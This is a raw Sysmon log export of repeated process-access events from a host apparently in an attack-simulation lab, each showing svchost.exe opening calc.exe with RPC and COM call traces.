10341000x8000000000000000360161Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360160Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360159Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360158Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360157Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360156Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360155Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360154Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360153Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360152Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360151Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360150Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360149Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360148Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360147Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360146Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360145Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360144Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360143Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360142Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360141Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360140Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
